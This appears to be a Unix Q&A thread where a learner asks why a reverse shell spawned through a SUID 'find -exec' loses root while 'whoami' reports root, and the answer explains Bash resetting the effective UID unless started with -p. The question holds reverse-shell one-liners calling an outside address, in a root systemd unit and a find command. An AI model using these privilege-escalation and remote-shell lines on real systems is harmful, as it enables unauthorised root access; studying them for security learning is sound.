# SUID find -exec TCP connection not being root

Tags: linux, unix, find, systemctl, suid

Let's say ***/usr/bin/systemctl*** and ***/usr/bin/find*** have ***4755*** (SUID) permissions and
there is a service ***root.service*** which executes an interactive shell over a tcp connection:

```
[Service]
User=root
ExecStart=/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.1.40/3456 0<&1"
[Install]
WantedBy=multi-user.target
```

If ***root.service*** is executed (as a service) as a non-root user, the user of the interactive shell created will be root.

**But** if the command executed is (also as a non-root user):

```
find . -exec /bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.1.40/3456 0<&1" \;
```

The user of the interactive shell created will be the same non-root user that executed the command.

**On the other hand**, if I execute as non-root user:

```
find . -exec whoami \;
```

It will return **root**.

In both cases I assume there is a TCP connection listening on the IP and port specified.

There is something about ***find -exec*** functioning I'm missing.

***¿Why is this difference?***

Comment: ...why do you have `find` with setuid?

Comment: @ilkkachu I'm learning about system security and privilege escalation. I can't think a good reason to have find with setuid but I would like to understand the functioning behind this.

Comment: ok, good answer.

Answer (score 0, accepted):

That probably happens because [Bash doesn't like being setuid](https://www.gnu.org/software/bash/manual/html_node/Bash-Startup-Files.html):

> **Invoked with unequal effective and real UID/GIDs**
> If Bash is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, no startup files are read, *[etc.]* and the effective user id is set to the real user id. If the -p option is supplied at invocation, the startup behavior is the same, but the effective user id is not reset.

Having *effective UID* != *real UID* is exactly what a setuid process sees, and there's really no reason to assume `find` would change that, so both UIDs get inherited to Bash, which then drops the UID gained through setuid.

You could probably also compare

```
find . -exec whoami \;
```

with

```
find . -exec bash -c whoami \;
```

Comment: That is a good comparison to understand the difference. Also, I knew Bash and SUID are not good friends, but I didn't know UID had something to do. Thank you!

Comment: @www, that's the "set" in "set-user-id"  ;) it sets the _effective_ UID to the file owner's UID. But leaves the "real UID" intact, so the set-uid program can see who launched it (and do some access control based on that, or drop the privileges back to those of that one user, or...) Bash probably works like that just to avoid vulnerabilities if a setuid program accidentally runs the shell.